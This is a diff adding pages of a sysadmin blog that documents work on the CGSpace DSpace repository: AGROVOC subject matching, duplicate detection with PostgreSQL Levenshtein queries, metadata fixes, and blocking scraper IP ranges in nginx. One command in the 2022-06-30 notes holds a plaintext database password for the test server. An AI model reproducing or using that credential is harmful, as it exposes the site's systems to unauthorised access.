+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">import</span> lightrdf
+</span></span><span style="display:flex;"><span>parser <span style="color:#f92672">=</span> lightrdf<span style="color:#f92672">.</span>Parser()
+</span></span><span style="display:flex;"><span><span style="color:#75715e"># prints millions of lines</span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> triple <span style="color:#f92672">in</span> parser<span style="color:#f92672">.</span>parse(<span style="color:#e6db74">&#34;./agrovoc_lod.rdf&#34;</span>, base_iri<span style="color:#f92672">=</span><span style="color:#66d9ef">None</span>):
+</span></span><span style="display:flex;"><span>     print(triple)
+</span></span><span style="display:flex;"><span>agrovoc <span style="color:#f92672">=</span> lightrdf<span style="color:#f92672">.</span>RDFDocument(<span style="color:#e6db74">&#39;agrovoc_lod.rdf&#39;</span>);
+</span></span><span style="display:flex;"><span><span style="color:#75715e"># all results for prefix http://aims.fao.org/aos/agrovoc/c_5</span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> triple <span style="color:#f92672">in</span> agrovoc<span style="color:#f92672">.</span>search_triples(<span style="color:#e6db74">&#39;http://aims.fao.org/aos/agrovoc/c_5&#39;</span>, <span style="color:#66d9ef">None</span>, <span style="color:#66d9ef">None</span>):
+</span></span><span style="display:flex;"><span>     print(triple)
+</span></span><span style="display:flex;"><span>(<span style="color:#e6db74">&#39;http://aims.fao.org/aos/agrovoc/c_5&#39;</span>, <span style="color:#e6db74">&#39;http://www.w3.org/2004/02/skos/core#altLabel&#39;</span>, <span style="color:#e6db74">&#39;&#34;Abalone&#34;@de&#39;</span>)
+</span></span><span style="display:flex;"><span>(<span style="color:#e6db74">&#39;http://aims.fao.org/aos/agrovoc/c_5&#39;</span>, <span style="color:#e6db74">&#39;http://www.w3.org/2004/02/skos/core#prefLabel&#39;</span>, <span style="color:#e6db74">&#39;&#34;abalones&#34;@en&#39;</span>)
+</span></span><span style="display:flex;"><span><span style="color:#75715e"># all stuff for abalones in English</span>
+</span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> triple <span style="color:#f92672">in</span> agrovoc<span style="color:#f92672">.</span>search_triples(<span style="color:#66d9ef">None</span>, <span style="color:#66d9ef">None</span>, <span style="color:#e6db74">&#39;&#34;abalones&#34;@en&#39;</span>):
+</span></span><span style="display:flex;"><span>     print(triple)
+</span></span></code></pre></div><ul>
+<li>I ran the <code>agrovoc-lookup.py</code> from a Linode server and it completed without issues&hellip; hmmm</li>
+</ul>
+<h2 id="2022-06-29">2022-06-29</h2>
+<ul>
+<li>Continue working on the list of non-AGROVOC subject to report to FAO
+<ul>
+<li>I got a one liner to get the list of non-AGROVOC subjects and join them with their counts (updated to use regex in csvgrep):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -r <span style="color:#e6db74">&#39;^0$&#39;</span> /tmp/2022-06-28-cgspace-subjects-results.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | csvcut -c subject \
+</span></span><span style="display:flex;"><span>  | csvjoin -c subject /tmp/2022-06-28-cgspace-subjects.csv - \
+</span></span><span style="display:flex;"><span>  &gt; /tmp/2022-06-28-cgspace-non-agrovoc.csv
+</span></span></code></pre></div><h2 id="2022-06-30">2022-06-30</h2>
+<ul>
+<li>Check some AfricaRice records for potential duplicates on CGSpace for Abenet:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -l -c dc.title,dcterms.issued,dcterms.type ~/Downloads/Africarice_2ndBatch_ay.csv | sed <span style="color:#e6db74">&#39;1s/line_number/id/&#39;</span> &gt; /tmp/africarice.csv
+</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i /tmp/africarice.csv -o /tmp/africarice-cleaned.csv -u
+</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/africarice-cleaned.csv -u dspacetest -db dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/africarice-duplicates.csv
+</span></span></code></pre></div><ul>
+<li>Looking at the non-AGROVOC subjects again, I see some in our list that are duplicated in uppercase and lowercase, so I will run it again with all lowercase:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS &#34;subject&#34;, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY &#34;subject&#34; ORDER BY count DESC) to /tmp/2022-06-30-cgspace-subjects.csv WITH CSV HEADER;
+</span></span></code></pre></div><ul>
+<li>Also, I see there might be something wrong with my csvjoin because nigeria shows up in the final list as having not matched&hellip;
+<ul>
+<li>Ah, I was using <code>csvgrep -m 0</code> to find rows that didn&rsquo;t match, but that also matched items that had 10, 100, 50, etc&hellip;</li>
+<li>We need to use a regex:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvgrep -c <span style="color:#e6db74">&#39;number of matches&#39;</span> -r <span style="color:#e6db74">&#39;^0$&#39;</span> /tmp/2022-06-30-cgspace-subjects-results.csv <span style="color:#ae81ff">\
+</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  | csvcut -c subject \
+</span></span><span style="display:flex;"><span>  | csvjoin -c subject /tmp/2022-06-30-cgspace-subjects.csv - \
+</span></span><span style="display:flex;"><span>  &gt; /tmp/2022-06-30-cgspace-non-agrovoc.csv
+</span></span></code></pre></div><ul>
+<li>Then I took all the terms with fifty or more occurences and put them on a Google Sheet
+<ul>
+<li>There I started removing any term that was a variation of an existing AGROVOC term (like cowpea/cowpeas, policy/policies) or a compound concept</li>
+</ul>
+</li>
+<li>pnbecker on DSpace Slack mentioned that they made a JSPUI deduplication step that is open source: <a href="https://github.com/the-library-code/deduplication">https://github.com/the-library-code/deduplication</a>
+<ul>
+<li>It uses Levenshtein distance via PostgreSQL&rsquo;s fuzzystrmatch extension</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-07/index.html b/docs/2022-07/index.html
new file mode 100644
index 000000000..a125d2632
--- /dev/null
+++ b/docs/2022-07/index.html
@@ -0,0 +1,790 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="July, 2022" />
+<meta property="og:description" content="2022-07-02
+
+I learned how to use the Levenshtein functions in PostgreSQL
+
+The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing
+Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-07/" />
+<meta property="article:published_time" content="2022-07-02T14:07:36+03:00" />
+<meta property="article:modified_time" content="2022-07-31T15:49:35+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="July, 2022"/>
+<meta name="twitter:description" content="2022-07-02
+
+I learned how to use the Levenshtein functions in PostgreSQL
+
+The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing
+Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "July, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-07/",
+  "wordCount": "3564",
+  "datePublished": "2022-07-02T14:07:36+03:00",
+  "dateModified": "2022-07-31T15:49:35+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-07/">
+
+    <title>July, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-07/">July, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-07-02T14:07:36+03:00">Sat Jul 02, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-07-02">2022-07-02</h2>
+<ul>
+<li>I learned how to use the Levenshtein functions in PostgreSQL
+<ul>
+<li>The thing is that there is a limit of 255 characters for these functions in PostgreSQL so you need to truncate the strings before comparing</li>
+<li>Also, the trgm functions I&rsquo;ve used before are case insensitive, but Levenshtein is not, so you need to make sure to lower case both strings first</li>
+</ul>
+</li>
+</ul>
+<ul>
+<li>A working query checking for duplicates in the recent AfricaRice items is:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= ☘ SELECT text_value FROM metadatavalue WHERE  dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND levenshtein_less_equal(LOWER(&#39;International Trade and Exotic Pests: The Risks for Biodiversity and African Economies&#39;), LEFT(LOWER(text_value), 255), 3) &lt;= 3;
+</span></span><span style="display:flex;"><span>                                       text_value                                       
+</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────
+</span></span><span style="display:flex;"><span> International trade and exotic pests: the risks for biodiversity and African economies
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 399.751 ms
+</span></span></code></pre></div><ul>
+<li>There is a great <a href="https://www.crunchydata.com/blog/fuzzy-name-matching-in-postgresql">blog post discussing Soundex with Levenshtein</a> and creating indexes to make them faster</li>
+<li>I want to do some proper checks of accuracy and speed against my trigram method</li>
+</ul>
+<h2 id="2022-07-03">2022-07-03</h2>
+<ul>
+<li>Start a harvest on AReS</li>
+</ul>
+<h2 id="2022-07-04">2022-07-04</h2>
+<ul>
+<li>Linode told me that CGSpace had high load yesterday
+<ul>
+<li>I also got some up and down notices from UptimeRobot</li>
+<li>Looking now, I see there was a very high CPU and database pool load, but a mostly normal DSpace session count</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2022/07/cpu-day.png" alt="CPU load day">
+<img src="/cgspace-notes/2022/07/jmx_tomcat_dbpools-day.png" alt="JDBC pool day"></p>
+<ul>
+<li>Seems we have some old database transactions since 2022-06-27:</li>
+</ul>
+<p><img src="/cgspace-notes/2022/07/postgres_locks_ALL-week.png" alt="PostgreSQL locks week">
+<img src="/cgspace-notes/2022/07/postgres_querylength_ALL-week.png" alt="PostgreSQL query length week"></p>
+<ul>
+<li>Looking at the top connections to nginx yesterday:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log.1 | sort | uniq -c | sort -h | tail
+</span></span><span style="display:flex;"><span>   1132 64.124.8.34
+</span></span><span style="display:flex;"><span>   1146 2a01:4f8:1c17:5550::1
+</span></span><span style="display:flex;"><span>   1380 137.184.159.211
+</span></span><span style="display:flex;"><span>   1533 64.124.8.59
+</span></span><span style="display:flex;"><span>   4013 80.248.237.167
+</span></span><span style="display:flex;"><span>   4776 54.195.118.125
+</span></span><span style="display:flex;"><span>  10482 45.5.186.2
+</span></span><span style="display:flex;"><span>  11177 172.104.229.92
+</span></span><span style="display:flex;"><span>  15855 2a01:7e00::f03c:91ff:fe9a:3a37
+</span></span><span style="display:flex;"><span>  22179 64.39.98.251
+</span></span></code></pre></div><ul>
+<li>And the total number of unique IPs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log.1 | sort -u | wc -l
+</span></span><span style="display:flex;"><span>6952
+</span></span></code></pre></div><ul>
+<li>This seems low, so it must have been from the request patterns by certain visitors
+<ul>
+<li>64.39.98.251 is Qualys, and I&rsquo;m debating blocking <a href="https://pci.qualys.com/static/help/merchant/getting_started/check_scanner_ip_addresses.htm">all their IPs</a> using a geo block in nginx (need to test)</li>
+<li>The top few are known ILRI and other CGIAR scrapers, but 80.248.237.167 is on InternetVikings in Sweden, using a normal user agentand scraping Discover</li>
+<li>64.124.8.59 is making requests with a normal user agent and belongs to Castle Global or Zayo</li>
+</ul>
+</li>
+<li>I ran all system updates and rebooted the server (could have just restarted PostgreSQL but I thought I might as well do everything)</li>
+<li>I implemented a geo mapping for the user agent mapping AND the nginx <code>limit_req_zone</code> by extracting the networks into an external file and including it in two different geo mapping blocks
+<ul>
+<li>This is clever and relies on the fact that we can use defaults in both cases</li>
+<li>First, we map the user agent of requests from these networks to &ldquo;bot&rdquo; so that Tomcat and Solr handle them accordingly</li>
+<li>Second, we use this as a key in a <code>limit_req_zone</code>, which relies on a default mapping of &rsquo;&rsquo; (and nginx doesn&rsquo;t evaluate empty cache keys)</li>
+</ul>
+</li>
+<li>I noticed that CIP uploaded a number of Georgian presentations with <code>dcterms.language</code> set to English and Other so I changed them to &ldquo;ka&rdquo;
+<ul>
+<li>Perhaps we need to update our list of languages to include all instead of the most common ones</li>
+</ul>
+</li>
+<li>I wrote a script <code>ilri/iso-639-value-pairs.py</code> to extract the names and Alpha 2 codes for all ISO 639-1 languages from pycountry and added them to <code>input-forms.xml</code></li>
+</ul>
+<h2 id="2022-07-06">2022-07-06</h2>
+<ul>
+<li>CGSpace went down and up a few times due to high load
+<ul>
+<li>I found one host in Romania making very high speed requests with a normal user agent (<code>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C</code>):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">10</span>
+</span></span><span style="display:flex;"><span>    516 142.132.248.90
+</span></span><span style="display:flex;"><span>    525 157.55.39.234
+</span></span><span style="display:flex;"><span>    587 66.249.66.21
+</span></span><span style="display:flex;"><span>    593 95.108.213.59
+</span></span><span style="display:flex;"><span>   1372 137.184.159.211
+</span></span><span style="display:flex;"><span>   4776 54.195.118.125
+</span></span><span style="display:flex;"><span>   5441 205.186.128.185
+</span></span><span style="display:flex;"><span>   6267 45.5.186.2
+</span></span><span style="display:flex;"><span>  15839 2a01:7e00::f03c:91ff:fe9a:3a37
+</span></span><span style="display:flex;"><span>  36114 146.19.75.141
+</span></span></code></pre></div><ul>
+<li>I added 146.19.75.141 to the list of bot networks in nginx</li>
+<li>While looking at the logs I started thinking about Bing again
+<ul>
+<li>They apparently <a href="https://www.bing.com/toolbox/bingbot.json">publish a list of all their networks</a></li>
+<li>I wrote a script to use <code>prips</code> to <a href="https://stackoverflow.com/a/52501093/1996540">print the IPs for each network</a></li>
+<li>The script is <code>bing-networks-to-ips.sh</code></li>
+<li>From Bing&rsquo;s IPs alone I purged 145,403 hits&hellip; sheesh</li>
+</ul>
+</li>
+<li>Delete two items on CGSpace for Margarita because she was getting the &ldquo;Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:0b26875a-&hellip;&rdquo; error
+<ul>
+<li>This is the same DSpace 6 bug I noticed in 2021-03, 2021-04, and 2021-05</li>
+</ul>
+</li>
+<li>Update some <code>cg.audience</code> metadata to use &ldquo;Academics&rdquo; instead of &ldquo;Academicians&rdquo;:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=&#39;Academics&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value=&#39;Academicians&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 104
+</span></span></code></pre></div><ul>
+<li>I will also have to remove &ldquo;Academicians&rdquo; from input-forms.xml</li>
+</ul>
+<h2 id="2022-07-07">2022-07-07</h2>
+<ul>
+<li>Finalize lists of non-AGROVOC subjects in CGSpace that I started last week
+<ul>
+<li>I used the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+6">SQL helper functions</a> to find the collections where each term was used:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= ☘ SELECT DISTINCT(ds6_item2collectionhandle(dspace_object_id)) AS collection, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND LOWER(text_value) = &#39;water demand&#39; GROUP BY collection ORDER BY count DESC LIMIT 5;
+</span></span><span style="display:flex;"><span> collection  │ count 
+</span></span><span style="display:flex;"><span>─────────────┼───────
+</span></span><span style="display:flex;"><span> 10568/36178 │    56
+</span></span><span style="display:flex;"><span> 10568/36185 │    46
+</span></span><span style="display:flex;"><span> 10568/36181 │    35
+</span></span><span style="display:flex;"><span> 10568/36188 │    28
+</span></span><span style="display:flex;"><span> 10568/36179 │    21
+</span></span><span style="display:flex;"><span>(5 rows)
+</span></span></code></pre></div><ul>
+<li>For now I only did terms from my list that had 100 or more occurrences in CGSpace
+<ul>
+<li>This leaves us with thirty-six terms that I will send to Sara Jani and Elizabeth Arnaud for evaluating possible inclusion to AGROVOC</li>
+</ul>
+</li>
+<li>Write to some submitters from CIAT, Bioversity, and CCAFS to ask if they are still uploading new items with their legacy subject fields on CGSpace
+<ul>
+<li>We want to remove them from the submission form to create space for new fields</li>
+</ul>
+</li>
+<li>Update one term I noticed people using that was close to AGROVOC:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value=&#39;development policies&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value=&#39;development policy&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 108
+</span></span></code></pre></div><ul>
+<li>After contacting some editors I removed some old metadata fields from the submission form and browse indexes:
+<ul>
+<li>Bioversity subject (<code>cg.subject.bioversity</code>)</li>
+<li>CCAFS phase 1 project tag (<code>cg.identifier.ccafsproject</code>)</li>
+<li>CIAT project tag (<code>cg.identifier.ciatproject</code>)</li>
+<li>CIAT subject (<code>cg.subject.ciat</code>)</li>
+</ul>
+</li>
+<li>Work on cleaning and proofing forty-six AfricaRice items for CGSpace
+<ul>
+<li>Last week we identified some duplicates so I removed those</li>
+<li>The data is of mediocre quality</li>
+<li>I&rsquo;ve been fixing citations (nitpick), adding licenses, adding volume/issue/extent, fixing DOIs, and adding some AGROVOC subjects</li>
+<li>I even found titles that have typos, looking something like OCR errors&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-07-08">2022-07-08</h2>
+<ul>
+<li>Finalize the cleaning and proofing of AfricaRice records
+<ul>
+<li>I found two suspicious items that claim to have been published but I can&rsquo;t find in the respective journals, so I removed those</li>
+<li>I uploaded the forty-four items to <a href="https://dspacetest.cgiar.org/handle/10568/119135">DSpace Test</a></li>
+</ul>
+</li>
+<li>Margarita from CCAFS said they are no longer using the CCAFS subject or CCAFS phase 2 project tag
+<ul>
+<li>I removed these from the input-form.xml and Discovery facets:
+<ul>
+<li>cg.identifier.ccafsprojectpii</li>
+<li>cg.subject.cifor</li>
+</ul>
+</li>
+<li>For now we will keep them in the search filters</li>
+</ul>
+</li>
+<li>I modified my <code>check-duplicates.py</code> script a bit to fix a logic error for deleted items and add similarity scores from spacy (see: <a href="https://stackoverflow.com/questions/8897593/how-to-compute-the-similarity-between-two-text-documents">https://stackoverflow.com/questions/8897593/how-to-compute-the-similarity-between-two-text-documents</a>)
+<ul>
+<li>I want to use this with the MARLO innovation reports, to find related publications and working papers on CGSpace</li>
+<li>I am curious to see how the similarity scores compare to those from trgm&hellip; perhaps we don&rsquo;t need them actually</li>
+</ul>
+</li>
+<li>Deploy latest changes to submission form, Discovery, and browse on CGSpace
+<ul>
+<li>Also run all system updates and reboot the host</li>
+</ul>
+</li>
+<li>Fix 152 <code>dcterms.relation</code> that are using &ldquo;cgspace.cgiar.org&rdquo; links instead of handles:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;.*cgspace\.cgiar\.org/handle/(\d+/\d+)$&#39;, &#39;https://hdl.handle.net/\1&#39;) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=180 AND text_value ~ &#39;cgspace\.cgiar\.org/handle/\d+/\d+$&#39;;
+</span></span></code></pre></div><h2 id="2022-07-10">2022-07-10</h2>
+<ul>
+<li>UptimeRobot says that CGSpace is down
+<ul>
+<li>I see high load around 22, high CPU around 800%</li>
+<li>Doesn&rsquo;t seem to be a lot of unique IPs:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /var/log/nginx/<span style="color:#f92672">{</span>access,library-access,oai,rest<span style="color:#f92672">}</span>.log | sort -u | wc -l
+</span></span><span style="display:flex;"><span>2243
+</span></span></code></pre></div><p>Looking at the top twenty I see some usual IPs, but some new ones on Hetzner that are using many DSpace sessions:</p>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep 65.109.2.97 dspace.log.2022-07-10 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>1613
+</span></span><span style="display:flex;"><span>$ grep 95.216.174.97 dspace.log.2022-07-10 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>1696
+</span></span><span style="display:flex;"><span>$ grep 65.109.15.213 dspace.log.2022-07-10 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>1708
+</span></span><span style="display:flex;"><span>$ grep 65.108.80.78 dspace.log.2022-07-10 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>1830
+</span></span><span style="display:flex;"><span>$ grep 65.108.95.23 dspace.log.2022-07-10 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>1811
+</span></span></code></pre></div><p><img src="/cgspace-notes/2022/07/jmx_dspace_sessions-week.png" alt="DSpace sessions week"></p>
+<ul>
+<li>
+<p>These IPs are using normal-looking user agents:</p>
+<ul>
+<li><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.9) Gecko/20100101 Goanna/4.1 Firefox/52.9 PaleMoon/28.0.0.1</code></li>
+<li><code>Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/45.0&quot;</code></li>
+<li><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:56.0) Gecko/20100101 Firefox/56.0.1 Waterfox/56.0.1</code></li>
+<li><code>Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.85 Safari/537.36</code></li>
+</ul>
+</li>
+<li>
+<p>I will add networks I&rsquo;m seeing now to nginx&rsquo;s bot-networks.conf for now (not all of Hetzner) and purge the hits later:</p>
+<ul>
+<li>65.108.0.0/16</li>
+<li>65.21.0.0/16</li>
+<li>95.216.0.0/16</li>
+<li>135.181.0.0/16</li>
+<li>138.201.0.0/16</li>
+</ul>
+</li>
+<li>
+<p>I think I&rsquo;m going to get to a point where I categorize all commercial subnets as bots by default and then whitelist those we need</p>
+</li>
+<li>
+<p>Sheesh, there are a bunch more IPv6 addresses also on Hetzner:</p>
+</li>
+</ul>
